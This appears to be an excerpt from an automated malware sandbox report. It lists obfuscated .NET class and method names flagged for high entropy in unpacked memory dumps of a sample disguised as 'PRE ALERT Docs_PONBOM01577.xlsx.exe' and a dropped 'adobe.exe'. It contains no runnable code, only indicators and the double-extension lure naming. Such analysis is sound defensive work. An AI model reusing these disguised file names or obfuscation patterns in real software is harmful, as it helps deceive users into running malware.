                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, sJ7fiJFFyK6osPUw34M.csHigh entropy of concatenated method names: 'ToString', 'SAEGcAbddD', 'PUIGO12n5v', 'InfGxhi3JC', 'ByuGhP43J2', 'MGAGXsUZXc', 'hy3G1YmOaT', 'Q5KGSEFRb6', 'GkwrXykGkFTpWYNeNAB', 'W30nAskpxZdPlL3YgXS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, Hi02iDQ2gBgWPDty6N.csHigh entropy of concatenated method names: 'ExEIrPqpK', 'QxtVGIc0Q', 'vOT3yKblI', 'apNpUFH0y', 'bkf8eu1yJ', 'elottBqy2', 'WZdm4HN0h93wHSHvYS', 'gMmdoBKIhmf5kR02Ts', 'i7UskmTSG', 'wYaGT4PhW'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, T8bvccOhIfvV5HBWMM.csHigh entropy of concatenated method names: 'lFAfoGKQGo', 'FgmfL4irFe', 'OxJfIkfUh7', 'm47fVZkwVg', 'CRwfU8QPEv', 'NHDf3GsEkU', 'e2Mfp7N7ca', 'JUCfniqDt0', 'DZhf8iq3bM', 'E0Wft28jk0'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, zQ5YunFDytNkOgIn8yZ.csHigh entropy of concatenated method names: 'dgPboq3e2i', 'rhDbL1hAvR', 'oiqbIJBF4E', 'jHfbVjC6ba', 'OstbUmMLeB', 'BuVb30Lgx2', 'jRsbpPp4Ax', 'v8abn2hNuY', 'kqpb8rC3gR', 'GObbtPOeJu'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, H4tCJy9NCfMBVS71J3.csHigh entropy of concatenated method names: 'U3EdxnDdGj', 'sm1dXyEg9B', 'W7cdSCjgtm', 'js8dfq50eJ', 'S6IdrHovkY', 'Dk4SANBvG1', 'jwFSqsSjvG', 'pgpS5RRd0F', 'JKCSjkmCQt', 'wtJSNiDadD'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, SPiHFIMwYaDrrusNMP.csHigh entropy of concatenated method names: 'KJWskQyIY0', 'm20sguLWP1', 'do0suFQlFf', 'kN6s0lKwis', 'bUEsBJXCBA', 'HCEs6CUcRE', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, ptRbsCzeYp8KN76ouN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zeFbwCTgWr', 'VZAbZndMub', 'J3bbQfKgHt', 'VVAb7Gx6EV', 'VDHbsDeCSv', 'eUnbbXHL1Q', 'Ad3bGcUlnF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, b3yglJ52boJJBcwNHd.csHigh entropy of concatenated method names: 'ujRwnr3QMi', 'eVfw8WqdTc', 'VfdwkHwxl2', 'eoAwg5whOM', 'IfKw05feTq', 'fIhw6N5TEs', 'ueSwTFOaZO', 'zDJwYfkeLY', 'RXuwJKAesj', 'SIQwv3wtpq'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, GSnIefby3g48AVtXRC.csHigh entropy of concatenated method names: 'TW9XB3BvfO', 'EfRXeystKT', 'mw0Xax4eFh', 'NF4Xm2TJV6', 'oSGXAuqZ3R', 'WVIXqWXalX', 'xkNX5fM5P1', 'uYvXjvp5VK', 'X5nXNDf69K', 'aYlXCpomsL'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, KJKWYe04ndXo1dLGx3.csHigh entropy of concatenated method names: 'BoO1VZ3yYZ', 'bZf13w2bGv', 'Muw1nTBUh2', 'qld18uYn3v', 'xic1ZvRaeo', 'cOn1QGCe3B', 'PJa17V3YuN', 'NT61smAoyN', 'PDk1bGayh1', 'hGx1G6TakJ'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, JIgtojd31oq0a8Ne66.csHigh entropy of concatenated method names: 'fBo7H6bu2o', 'BG17MHAIkt', 'ToString', 'vft7hQ0sWB', 'B847XV6Ftf', 'oZQ719mtPd', 'dy87SBe5EE', 'Ln37dc9MFb', 'qru7fwptEf', 'DPI7rI16GF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, cYgM2iBJbIwf49iAyB.csHigh entropy of concatenated method names: 'JpIZJVMdmN', 'T4tZixUith', 'nLMZBAZBEL', 'eNgZeiJCcF', 'ErTZgnDjxw', 'cFuZucEK9a', 'oxdZ0DZtRo', 'FVBZ6Vuj3S', 'LCVZ4OrxBZ', 'DOIZT7BQfO'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, YIBjEUC2hYAeNNhpTX.csHigh entropy of concatenated method names: 'Dispose', 'JwoPNI70GU', 'QXJDgyodMG', 'T1tRRlfWiv', 'bqnPCBWfoI', 'NiAPzALTrw', 'ProcessDialogKey', 'BS7DWLDZI0', 'PwjDPVPySr', 'CN0DD82I3e'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, u0WLUiFmU62nf8wvh47.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UKLGBQHpdg', 'TuMGesqYuQ', 'zokGaY7PiQ', 'gpvGmOX0fD', 'b7YGAYCWv9', 'GMhGqfFUlP', 'RZdG5RTbgb'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, arCIwW2EHbpP4FTa9P.csHigh entropy of concatenated method names: 'YQ9bP1LGFV', 'jFtbcPGs1b', 'nv7bOMvOgk', 'MkIbhlUljB', 'rwnbXr95jl', 'HVmbS8lLqf', 'bIpbdwft5E', 'hyXs5a5PAR', 'Nv2sj19auZ', 'BiCsNtVcqS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, KbE2EyPT6T9ZpExMle.csHigh entropy of concatenated method names: 'ToString', 'dSQQv7JoOT', 'Vu1QgLGjmo', 'XbUQutePo2', 'LP3Q0qH8eV', 'x80Q6sLK7x', 'eaIQ4vYth2', 'vlBQTxf70B', 'uYaQY2hXcM', 'OXsQKL0Bnc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, EpHttsc5PRSC3qdCh0.csHigh entropy of concatenated method names: 'TaDSUA9o0g', 'SixSpF612C', 'Rkc1uEVDhb', 'ce4101dNwk', 'Qlt16mC0Mn', 'uMt14KQQtc', 'j6I1Tqs26R', 'zt51YW7cJF', 'y1K1KI8SIW', 'idE1JMyZrc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, c2nuaZ1j2jxTrWK6iR.csHigh entropy of concatenated method names: 'MbicxpZ2iF', 'JuvchEhy8a', 'uXOcXbhS9N', 'QQ8c1B4lO2', 'MU5cSQc8hy', 'CwEcdg1ndQ', 'TxacfmwhGN', 'J97crMb2vj', 'EC2c2tX3Zx', 'WapcHvx2f5'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, tu8VtYjuLCMFEaI0Kd.csHigh entropy of concatenated method names: 'aNAfhsbeQA', 'UoBf12RayJ', 'EEdfdJXQ7P', 'o71dCZ3WBi', 'ecndzTPK3s', 'xHofWXUWvo', 'trmfPtxGBm', 'DaufDjjCpS', 'SIEfcmy6HR', 'uqlfOjnjXk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, O9liTyGSgHOXubn0i8.csHigh entropy of concatenated method names: 'HQishiHRWB', 'PZasXxLYvU', 'Gwws181ICw', 'aOnsSSdRIu', 'B0Ysdwggw4', 'WvRsfN7ceT', 'OBIsrBt0iK', 'wl5s2xhcHe', 'MMfsHfRpvH', 'bhDsMBYxIU'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, MW4t0FZVT9Flwx07F2.csHigh entropy of concatenated method names: 'jKmPfj3Zwa', 'TaCPrOI7mq', 'yjYPH7Wcjj', 'ulBPMllnPr', 'PKHPZvvWyr', 'nP0PQQnG5l', 'f1RXY0xkuhabvDSNLZ', 'xkE2kPXe5CJUGkmRWn', 'Lv5PPQGMPR', 'nh7PcE3Gqk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, JKi31c4KTy182hEMiH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rGjDNNgBFF', 'SyDDCYKoCw', 'AouDzPOKth', 'SUncWnHE9k', 'jjLcPWdNNW', 'AN1cD79LKr', 'NY3ccAJYqr', 'Mop9wOvR3GhBV8GFaeK'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, sJ7fiJFFyK6osPUw34M.csHigh entropy of concatenated method names: 'ToString', 'SAEGcAbddD', 'PUIGO12n5v', 'InfGxhi3JC', 'ByuGhP43J2', 'MGAGXsUZXc', 'hy3G1YmOaT', 'Q5KGSEFRb6', 'GkwrXykGkFTpWYNeNAB', 'W30nAskpxZdPlL3YgXS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, Hi02iDQ2gBgWPDty6N.csHigh entropy of concatenated method names: 'ExEIrPqpK', 'QxtVGIc0Q', 'vOT3yKblI', 'apNpUFH0y', 'bkf8eu1yJ', 'elottBqy2', 'WZdm4HN0h93wHSHvYS', 'gMmdoBKIhmf5kR02Ts', 'i7UskmTSG', 'wYaGT4PhW'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, T8bvccOhIfvV5HBWMM.csHigh entropy of concatenated method names: 'lFAfoGKQGo', 'FgmfL4irFe', 'OxJfIkfUh7', 'm47fVZkwVg', 'CRwfU8QPEv', 'NHDf3GsEkU', 'e2Mfp7N7ca', 'JUCfniqDt0', 'DZhf8iq3bM', 'E0Wft28jk0'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, zQ5YunFDytNkOgIn8yZ.csHigh entropy of concatenated method names: 'dgPboq3e2i', 'rhDbL1hAvR', 'oiqbIJBF4E', 'jHfbVjC6ba', 'OstbUmMLeB', 'BuVb30Lgx2', 'jRsbpPp4Ax', 'v8abn2hNuY', 'kqpb8rC3gR', 'GObbtPOeJu'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, H4tCJy9NCfMBVS71J3.csHigh entropy of concatenated method names: 'U3EdxnDdGj', 'sm1dXyEg9B', 'W7cdSCjgtm', 'js8dfq50eJ', 'S6IdrHovkY', 'Dk4SANBvG1', 'jwFSqsSjvG', 'pgpS5RRd0F', 'JKCSjkmCQt', 'wtJSNiDadD'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, SPiHFIMwYaDrrusNMP.csHigh entropy of concatenated method names: 'KJWskQyIY0', 'm20sguLWP1', 'do0suFQlFf', 'kN6s0lKwis', 'bUEsBJXCBA', 'HCEs6CUcRE', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, ptRbsCzeYp8KN76ouN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zeFbwCTgWr', 'VZAbZndMub', 'J3bbQfKgHt', 'VVAb7Gx6EV', 'VDHbsDeCSv', 'eUnbbXHL1Q', 'Ad3bGcUlnF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, b3yglJ52boJJBcwNHd.csHigh entropy of concatenated method names: 'ujRwnr3QMi', 'eVfw8WqdTc', 'VfdwkHwxl2', 'eoAwg5whOM', 'IfKw05feTq', 'fIhw6N5TEs', 'ueSwTFOaZO', 'zDJwYfkeLY', 'RXuwJKAesj', 'SIQwv3wtpq'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, GSnIefby3g48AVtXRC.csHigh entropy of concatenated method names: 'TW9XB3BvfO', 'EfRXeystKT', 'mw0Xax4eFh', 'NF4Xm2TJV6', 'oSGXAuqZ3R', 'WVIXqWXalX', 'xkNX5fM5P1', 'uYvXjvp5VK', 'X5nXNDf69K', 'aYlXCpomsL'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, KJKWYe04ndXo1dLGx3.csHigh entropy of concatenated method names: 'BoO1VZ3yYZ', 'bZf13w2bGv', 'Muw1nTBUh2', 'qld18uYn3v', 'xic1ZvRaeo', 'cOn1QGCe3B', 'PJa17V3YuN', 'NT61smAoyN', 'PDk1bGayh1', 'hGx1G6TakJ'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, JIgtojd31oq0a8Ne66.csHigh entropy of concatenated method names: 'fBo7H6bu2o', 'BG17MHAIkt', 'ToString', 'vft7hQ0sWB', 'B847XV6Ftf', 'oZQ719mtPd', 'dy87SBe5EE', 'Ln37dc9MFb', 'qru7fwptEf', 'DPI7rI16GF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, cYgM2iBJbIwf49iAyB.csHigh entropy of concatenated method names: 'JpIZJVMdmN', 'T4tZixUith', 'nLMZBAZBEL', 'eNgZeiJCcF', 'ErTZgnDjxw', 'cFuZucEK9a', 'oxdZ0DZtRo', 'FVBZ6Vuj3S', 'LCVZ4OrxBZ', 'DOIZT7BQfO'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, YIBjEUC2hYAeNNhpTX.csHigh entropy of concatenated method names: 'Dispose', 'JwoPNI70GU', 'QXJDgyodMG', 'T1tRRlfWiv', 'bqnPCBWfoI', 'NiAPzALTrw', 'ProcessDialogKey', 'BS7DWLDZI0', 'PwjDPVPySr', 'CN0DD82I3e'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, u0WLUiFmU62nf8wvh47.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UKLGBQHpdg', 'TuMGesqYuQ', 'zokGaY7PiQ', 'gpvGmOX0fD', 'b7YGAYCWv9', 'GMhGqfFUlP', 'RZdG5RTbgb'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, arCIwW2EHbpP4FTa9P.csHigh entropy of concatenated method names: 'YQ9bP1LGFV', 'jFtbcPGs1b', 'nv7bOMvOgk', 'MkIbhlUljB', 'rwnbXr95jl', 'HVmbS8lLqf', 'bIpbdwft5E', 'hyXs5a5PAR', 'Nv2sj19auZ', 'BiCsNtVcqS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, KbE2EyPT6T9ZpExMle.csHigh entropy of concatenated method names: 'ToString', 'dSQQv7JoOT', 'Vu1QgLGjmo', 'XbUQutePo2', 'LP3Q0qH8eV', 'x80Q6sLK7x', 'eaIQ4vYth2', 'vlBQTxf70B', 'uYaQY2hXcM', 'OXsQKL0Bnc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, EpHttsc5PRSC3qdCh0.csHigh entropy of concatenated method names: 'TaDSUA9o0g', 'SixSpF612C', 'Rkc1uEVDhb', 'ce4101dNwk', 'Qlt16mC0Mn', 'uMt14KQQtc', 'j6I1Tqs26R', 'zt51YW7cJF', 'y1K1KI8SIW', 'idE1JMyZrc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, c2nuaZ1j2jxTrWK6iR.csHigh entropy of concatenated method names: 'MbicxpZ2iF', 'JuvchEhy8a', 'uXOcXbhS9N', 'QQ8c1B4lO2', 'MU5cSQc8hy', 'CwEcdg1ndQ', 'TxacfmwhGN', 'J97crMb2vj', 'EC2c2tX3Zx', 'WapcHvx2f5'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, tu8VtYjuLCMFEaI0Kd.csHigh entropy of concatenated method names: 'aNAfhsbeQA', 'UoBf12RayJ', 'EEdfdJXQ7P', 'o71dCZ3WBi', 'ecndzTPK3s', 'xHofWXUWvo', 'trmfPtxGBm', 'DaufDjjCpS', 'SIEfcmy6HR', 'uqlfOjnjXk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, O9liTyGSgHOXubn0i8.csHigh entropy of concatenated method names: 'HQishiHRWB', 'PZasXxLYvU', 'Gwws181ICw', 'aOnsSSdRIu', 'B0Ysdwggw4', 'WvRsfN7ceT', 'OBIsrBt0iK', 'wl5s2xhcHe', 'MMfsHfRpvH', 'bhDsMBYxIU'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, MW4t0FZVT9Flwx07F2.csHigh entropy of concatenated method names: 'jKmPfj3Zwa', 'TaCPrOI7mq', 'yjYPH7Wcjj', 'ulBPMllnPr', 'PKHPZvvWyr', 'nP0PQQnG5l', 'f1RXY0xkuhabvDSNLZ', 'xkE2kPXe5CJUGkmRWn', 'Lv5PPQGMPR', 'nh7PcE3Gqk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, JKi31c4KTy182hEMiH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rGjDNNgBFF', 'SyDDCYKoCw', 'AouDzPOKth', 'SUncWnHE9k', 'jjLcPWdNNW', 'AN1cD79LKr', 'NY3ccAJYqr', 'Mop9wOvR3GhBV8GFaeK'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, sJ7fiJFFyK6osPUw34M.csHigh entropy of concatenated method names: 'ToString', 'SAEGcAbddD', 'PUIGO12n5v', 'InfGxhi3JC', 'ByuGhP43J2', 'MGAGXsUZXc', 'hy3G1YmOaT', 'Q5KGSEFRb6', 'GkwrXykGkFTpWYNeNAB', 'W30nAskpxZdPlL3YgXS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, Hi02iDQ2gBgWPDty6N.csHigh entropy of concatenated method names: 'ExEIrPqpK', 'QxtVGIc0Q', 'vOT3yKblI', 'apNpUFH0y', 'bkf8eu1yJ', 'elottBqy2', 'WZdm4HN0h93wHSHvYS', 'gMmdoBKIhmf5kR02Ts', 'i7UskmTSG', 'wYaGT4PhW'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, T8bvccOhIfvV5HBWMM.csHigh entropy of concatenated method names: 'lFAfoGKQGo', 'FgmfL4irFe', 'OxJfIkfUh7', 'm47fVZkwVg', 'CRwfU8QPEv', 'NHDf3GsEkU', 'e2Mfp7N7ca', 'JUCfniqDt0', 'DZhf8iq3bM', 'E0Wft28jk0'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, zQ5YunFDytNkOgIn8yZ.csHigh entropy of concatenated method names: 'dgPboq3e2i', 'rhDbL1hAvR', 'oiqbIJBF4E', 'jHfbVjC6ba', 'OstbUmMLeB', 'BuVb30Lgx2', 'jRsbpPp4Ax', 'v8abn2hNuY', 'kqpb8rC3gR', 'GObbtPOeJu'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, H4tCJy9NCfMBVS71J3.csHigh entropy of concatenated method names: 'U3EdxnDdGj', 'sm1dXyEg9B', 'W7cdSCjgtm', 'js8dfq50eJ', 'S6IdrHovkY', 'Dk4SANBvG1', 'jwFSqsSjvG', 'pgpS5RRd0F', 'JKCSjkmCQt', 'wtJSNiDadD'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, SPiHFIMwYaDrrusNMP.csHigh entropy of concatenated method names: 'KJWskQyIY0', 'm20sguLWP1', 'do0suFQlFf', 'kN6s0lKwis', 'bUEsBJXCBA', 'HCEs6CUcRE', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, ptRbsCzeYp8KN76ouN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zeFbwCTgWr', 'VZAbZndMub', 'J3bbQfKgHt', 'VVAb7Gx6EV', 'VDHbsDeCSv', 'eUnbbXHL1Q', 'Ad3bGcUlnF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, b3yglJ52boJJBcwNHd.csHigh entropy of concatenated method names: 'ujRwnr3QMi', 'eVfw8WqdTc', 'VfdwkHwxl2', 'eoAwg5whOM', 'IfKw05feTq', 'fIhw6N5TEs', 'ueSwTFOaZO', 'zDJwYfkeLY', 'RXuwJKAesj', 'SIQwv3wtpq'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, GSnIefby3g48AVtXRC.csHigh entropy of concatenated method names: 'TW9XB3BvfO', 'EfRXeystKT', 'mw0Xax4eFh', 'NF4Xm2TJV6', 'oSGXAuqZ3R', 'WVIXqWXalX', 'xkNX5fM5P1', 'uYvXjvp5VK', 'X5nXNDf69K', 'aYlXCpomsL'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, KJKWYe04ndXo1dLGx3.csHigh entropy of concatenated method names: 'BoO1VZ3yYZ', 'bZf13w2bGv', 'Muw1nTBUh2', 'qld18uYn3v', 'xic1ZvRaeo', 'cOn1QGCe3B', 'PJa17V3YuN', 'NT61smAoyN', 'PDk1bGayh1', 'hGx1G6TakJ'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, JIgtojd31oq0a8Ne66.csHigh entropy of concatenated method names: 'fBo7H6bu2o', 'BG17MHAIkt', 'ToString', 'vft7hQ0sWB', 'B847XV6Ftf', 'oZQ719mtPd', 'dy87SBe5EE', 'Ln37dc9MFb', 'qru7fwptEf', 'DPI7rI16GF'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, cYgM2iBJbIwf49iAyB.csHigh entropy of concatenated method names: 'JpIZJVMdmN', 'T4tZixUith', 'nLMZBAZBEL', 'eNgZeiJCcF', 'ErTZgnDjxw', 'cFuZucEK9a', 'oxdZ0DZtRo', 'FVBZ6Vuj3S', 'LCVZ4OrxBZ', 'DOIZT7BQfO'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, YIBjEUC2hYAeNNhpTX.csHigh entropy of concatenated method names: 'Dispose', 'JwoPNI70GU', 'QXJDgyodMG', 'T1tRRlfWiv', 'bqnPCBWfoI', 'NiAPzALTrw', 'ProcessDialogKey', 'BS7DWLDZI0', 'PwjDPVPySr', 'CN0DD82I3e'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, u0WLUiFmU62nf8wvh47.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UKLGBQHpdg', 'TuMGesqYuQ', 'zokGaY7PiQ', 'gpvGmOX0fD', 'b7YGAYCWv9', 'GMhGqfFUlP', 'RZdG5RTbgb'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, arCIwW2EHbpP4FTa9P.csHigh entropy of concatenated method names: 'YQ9bP1LGFV', 'jFtbcPGs1b', 'nv7bOMvOgk', 'MkIbhlUljB', 'rwnbXr95jl', 'HVmbS8lLqf', 'bIpbdwft5E', 'hyXs5a5PAR', 'Nv2sj19auZ', 'BiCsNtVcqS'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, KbE2EyPT6T9ZpExMle.csHigh entropy of concatenated method names: 'ToString', 'dSQQv7JoOT', 'Vu1QgLGjmo', 'XbUQutePo2', 'LP3Q0qH8eV', 'x80Q6sLK7x', 'eaIQ4vYth2', 'vlBQTxf70B', 'uYaQY2hXcM', 'OXsQKL0Bnc'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, EpHttsc5PRSC3qdCh0.csHigh entropy of concatenated method names: 'TaDSUA9o0g', 'SixSpF612C', 'Rkc1uEVDhb', 'ce4101dNwk', 'Qlt16mC0Mn', 'uMt14KQQtc', 'j6I1Tqs26R', 'zt51YW7cJF', 'y1K1KI8SIW', 'idE1JMyZrc'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, c2nuaZ1j2jxTrWK6iR.csHigh entropy of concatenated method names: 'MbicxpZ2iF', 'JuvchEhy8a', 'uXOcXbhS9N', 'QQ8c1B4lO2', 'MU5cSQc8hy', 'CwEcdg1ndQ', 'TxacfmwhGN', 'J97crMb2vj', 'EC2c2tX3Zx', 'WapcHvx2f5'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, tu8VtYjuLCMFEaI0Kd.csHigh entropy of concatenated method names: 'aNAfhsbeQA', 'UoBf12RayJ', 'EEdfdJXQ7P', 'o71dCZ3WBi', 'ecndzTPK3s', 'xHofWXUWvo', 'trmfPtxGBm', 'DaufDjjCpS', 'SIEfcmy6HR', 'uqlfOjnjXk'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, O9liTyGSgHOXubn0i8.csHigh entropy of concatenated method names: 'HQishiHRWB', 'PZasXxLYvU', 'Gwws181ICw', 'aOnsSSdRIu', 'B0Ysdwggw4', 'WvRsfN7ceT', 'OBIsrBt0iK', 'wl5s2xhcHe', 'MMfsHfRpvH', 'bhDsMBYxIU'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, MW4t0FZVT9Flwx07F2.csHigh entropy of concatenated method names: 'jKmPfj3Zwa', 'TaCPrOI7mq', 'yjYPH7Wcjj', 'ulBPMllnPr', 'PKHPZvvWyr', 'nP0PQQnG5l', 'f1RXY0xkuhabvDSNLZ', 'xkE2kPXe5CJUGkmRWn', 'Lv5PPQGMPR', 'nh7PcE3Gqk'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, JKi31c4KTy182hEMiH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rGjDNNgBFF', 'SyDDCYKoCw', 'AouDzPOKth', 'SUncWnHE9k', 'jjLcPWdNNW', 'AN1cD79LKr', 'NY3ccAJYqr', 'Mop9wOvR3GhBV8GFaeK'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, sJ7fiJFFyK6osPUw34M.csHigh entropy of concatenated method names: 'ToString', 'SAEGcAbddD', 'PUIGO12n5v', 'InfGxhi3JC', 'ByuGhP43J2', 'MGAGXsUZXc', 'hy3G1YmOaT', 'Q5KGSEFRb6', 'GkwrXykGkFTpWYNeNAB', 'W30nAskpxZdPlL3YgXS'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, Hi02iDQ2gBgWPDty6N.csHigh entropy of concatenated method names: 'ExEIrPqpK', 'QxtVGIc0Q', 'vOT3yKblI', 'apNpUFH0y', 'bkf8eu1yJ', 'elottBqy2', 'WZdm4HN0h93wHSHvYS', 'gMmdoBKIhmf5kR02Ts', 'i7UskmTSG', 'wYaGT4PhW'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, T8bvccOhIfvV5HBWMM.csHigh entropy of concatenated method names: 'lFAfoGKQGo', 'FgmfL4irFe', 'OxJfIkfUh7', 'm47fVZkwVg', 'CRwfU8QPEv', 'NHDf3GsEkU', 'e2Mfp7N7ca', 'JUCfniqDt0', 'DZhf8iq3bM', 'E0Wft28jk0'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, zQ5YunFDytNkOgIn8yZ.csHigh entropy of concatenated method names: 'dgPboq3e2i', 'rhDbL1hAvR', 'oiqbIJBF4E', 'jHfbVjC6ba', 'OstbUmMLeB', 'BuVb30Lgx2', 'jRsbpPp4Ax', 'v8abn2hNuY', 'kqpb8rC3gR', 'GObbtPOeJu'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, H4tCJy9NCfMBVS71J3.csHigh entropy of concatenated method names: 'U3EdxnDdGj', 'sm1dXyEg9B', 'W7cdSCjgtm', 'js8dfq50eJ', 'S6IdrHovkY', 'Dk4SANBvG1', 'jwFSqsSjvG', 'pgpS5RRd0F', 'JKCSjkmCQt', 'wtJSNiDadD'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, SPiHFIMwYaDrrusNMP.csHigh entropy of concatenated method names: 'KJWskQyIY0', 'm20sguLWP1', 'do0suFQlFf', 'kN6s0lKwis', 'bUEsBJXCBA', 'HCEs6CUcRE', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, ptRbsCzeYp8KN76ouN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zeFbwCTgWr', 'VZAbZndMub', 'J3bbQfKgHt', 'VVAb7Gx6EV', 'VDHbsDeCSv', 'eUnbbXHL1Q', 'Ad3bGcUlnF'
